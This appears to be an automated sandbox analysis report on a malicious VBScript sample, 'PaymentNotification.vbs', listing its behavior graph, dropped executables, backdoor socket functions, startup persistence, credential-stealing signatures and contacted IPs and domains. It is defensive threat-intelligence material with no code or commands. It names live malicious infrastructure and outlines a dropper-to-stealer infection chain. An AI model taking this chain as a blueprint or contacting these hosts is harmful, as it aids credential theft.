Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0A8E listen, 13_2_02CC0A8E
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0FC6 bind, 13_2_02CC0FC6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0A50 listen, 13_2_02CC0A50
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_02CC0F93 bind, 13_2_02CC0F93
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 399489 Sample: PaymentNotification.vbs Startdate: 28/04/2021 Architecture: WINDOWS Score: 100 86 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->86 88 Found malware configuration 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 18 other signatures 2->92 9 wscript.exe 16 2->9         started        14 d4c6a6df7bab3dad31763de990c4ed82.exe 5 2->14         started        process3 dnsIp4 66 ia601504.us.archive.org 207.241.227.114, 443, 49699 INTERNET-ARCHIVEUS United States 9->66 52 C:\Users\user\AppData\Local\Temp\pgr.exe, PE32 9->52 dropped 54 C:\Users\user\AppData\Local\Temp\Tmp.exe, PE32 9->54 dropped 110 System process connects to network (likely due to code injection or exploit) 9->110 112 Benign windows process drops PE files 9->112 114 VBScript performs obfuscated calls to suspicious functions 9->114 16 pgr.exe 2 10 9->16         started        20 Tmp.exe 2 5 9->20         started        file5 signatures6 process7 file8 44 C:\...\79c06ef4ef423d882819c4e66285ec85.exe, PE32 16->44 dropped 46 C:\Users\user\AppData\...\tmpFB21.tmp.exe, PE32 16->46 dropped 48 C:\Users\user\AppData\...\tmp87E4.tmp.exe, PE32 16->48 dropped 68 Antivirus detection for dropped file 16->68 70 Multi AV Scanner detection for dropped file 16->70 72 Machine Learning detection for dropped file 16->72 74 Drops PE files to the startup folder 16->74 22 tmpFB21.tmp.exe 16->22         started        26 tmp87E4.tmp.exe 2 16->26         started        28 netsh.exe 1 3 16->28         started        50 C:\Users\user\AppData\Roaming\servieda.exe, PE32 20->50 dropped 76 Detected unpacking (overwrites its own PE header) 20->76 30 servieda.exe 6 20->30         started        signatures9 process10 dnsIp11 58 neesoontat.com.my 103.6.196.196, 49726, 49732, 587 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 22->58 60 whatismyipaddress.com 104.16.154.36, 49724, 80 CLOUDFLARENETUS United States 22->60 64 3 other IPs or domains 22->64 94 Antivirus detection for dropped file 22->94 96 May check the online IP address of the machine 22->96 98 Machine Learning detection for dropped file 22->98 106 5 other signatures 22->106 33 vbc.exe 22->33         started        36 vbc.exe 22->36         started        38 conhost.exe 28->38         started        62 185.140.53.71, 3429, 49705, 49706 DAVID_CRAIGGG Sweden 30->62 56 C:\...\d4c6a6df7bab3dad31763de990c4ed82.exe, PE32 30->56 dropped 100 Multi AV Scanner detection for dropped file 30->100 102 Detected unpacking (overwrites its own PE header) 30->102 104 Drops PE files to the startup folder 30->104 108 2 other signatures 30->108 40 netsh.exe 3 30->40         started        file12 signatures13 process14 signatures15 78 Tries to steal Mail credentials (via file registry) 33->78 80 Tries to steal Instant Messenger accounts or passwords 33->80 82 Tries to steal Mail credentials (via file access) 33->82 84 Tries to harvest and steal browser information (history, passwords, etc) 36->84 42 conhost.exe 40->42         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.16.154.36
whatismyipaddress.com United States
13335 CLOUDFLARENETUS false
103.6.196.196
neesoontat.com.my Malaysia
46015 EXABYTES-AS-APExaBytesNetworkSdnBhdMY true
207.241.227.114
ia601504.us.archive.org United States
7941 INTERNET-ARCHIVEUS false
185.140.53.71
unknown Sweden
209623 DAVID_CRAIGGG true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
whatismyipaddress.com 104.16.154.36 true
ia601504.us.archive.org 207.241.227.114 true
neesoontat.com.my 103.6.196.196 true
81.189.14.0.in-addr.arpa unknown unknown
mail.neesoontat.com.my unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://whatismyipaddress.com/ false
    high
    185.140.53.71 true
    • Avira URL Cloud: safe
    unknown